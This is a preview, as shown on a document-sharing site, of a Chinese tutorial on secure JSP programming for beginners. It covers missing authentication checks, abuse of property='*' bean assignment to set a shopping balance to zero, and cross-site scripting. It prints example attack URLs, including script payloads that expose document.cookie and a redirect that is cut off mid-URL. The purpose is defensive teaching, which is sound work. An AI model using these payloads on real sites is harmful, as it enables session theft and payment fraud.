jsp安全编程实例浅析

jsp安全编程实例浅析

ID:19998525

大小:44.50 KB

页数:5页

时间:2018-10-08

jsp安全编程实例浅析_第1页
jsp安全编程实例浅析_第2页
jsp安全编程实例浅析_第3页
jsp安全编程实例浅析_第4页
jsp安全编程实例浅析_第5页
资源描述:

《jsp安全编程实例浅析》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、JSP安全编程实例浅析JavaServerPage(JSP)作为建立动态网页的技术正在不断升温。JSP和ASP、PHP、工作机制不太一样。一般说来,JSP页面在执行时是编译式,而不是解释式的。首次调用JSP文件其实是执行一个编译为Servlet的过程。当浏览器向服务器请求这一个JSP文件的时候,服务器将检查自上次编译后JSP文件是否有改变,如果没有改变,就直接执行Servlet,而不用再重新编译,这样,效率便得到了明显提高。今天我将和大家一起从脚本编程的角度看JSP的安全,那些诸如源码暴露类的安全隐患就不

2、在这篇文章讨论范围之内了。写这篇文章的主要目的是给初学JSP编程的朋友们提个醒,从一开始就要培养安全编程的意识,不要犯不该犯的错误,避免可以避免的损失。一、认证不严——低级失误在一论坛中,user_manager.jsp是用户管理的页面,作者知道它的敏感性,加上了一把锁:if((session.getValue("UserName")==null)││(session.getValue("UserClass")==null)││(!session.getValue("UserClass").equals(

3、"系统管理员"))){response.sendRedirect("err.jsp?id=14");return;}如果要查看、修改某用户的信息,就要用modifyuser_manager.jsp这个文件。管理员提交http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51就是查看、修改ID为51的用户的资料(管理员默认的用户ID为51)。但是,如此重要的文件竟缺乏认证,普通用户(包括游客)也直接提交上述请求也可以对其一览无余(密码

4、也是明文存储、显示的)。modifyuser_manage.jsp同样是门户大开,直到恶意用户把数据更新的操作执行完毕,重定向到user_manager.jsp的时候,他才会看见那个姗姗来迟的显示错误的页面。显然,只锁一扇门是远远不够的,编程的时候一定要不厌其烦地为每一个该加身份认证的地方加上身份认证。二、守好JavaBean的入口JSP组件技术的核心是被称为bean的java组件。在程序中可把逻辑控制、数据库操作放在javabeans组件中,然后在JSP文件中调用它,这样可增加程序的清晰度及程序的可重用

5、性。和传统的ASP或PHP页面相比,JSP页面是非常简洁的,因为许多动态页面处理过程可以封装到JavaBean中。要改变JavaBean属性,要用到“”标记。下面的代码是假想的某电子购物系统的源码的一部分,这个文件是用来显示用户的购物框中的信息的,而checkout.jsp是用来结帐的。Youhaveaddedtheitemtoyourbasket.Yourtotalis$Proceedtocheckout注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是直接通过QuerySt

6、ring提交的全部变量的值,将存储到匹配的bean属性中。一般,用户是这样提交请求的:http://www.somesite.com/addToBasket.jsp?newItem=ITEM0105342但是不守规矩的用户呢?他们可能会提交:http://www.somesite.com/addToBasket.jsp?newItem=ITEM0105342&balance=0这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时候,费用就全免了。这与P

7、HP中全局变量导致的安全问题如出一辙。由此可见:“property="*"”一定要慎用!三、长盛不衰的跨站脚本跨站脚本(CrossSiteScripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript,VBScript,ActiveX,HTML,或Flash等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。以仿动网的阿菜论坛(beta-1)举个最简单的例子。当我们

8、提交http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>alert(document.cookie)便能弹出包含自己cookie信息的对话框。而提交http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.1

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。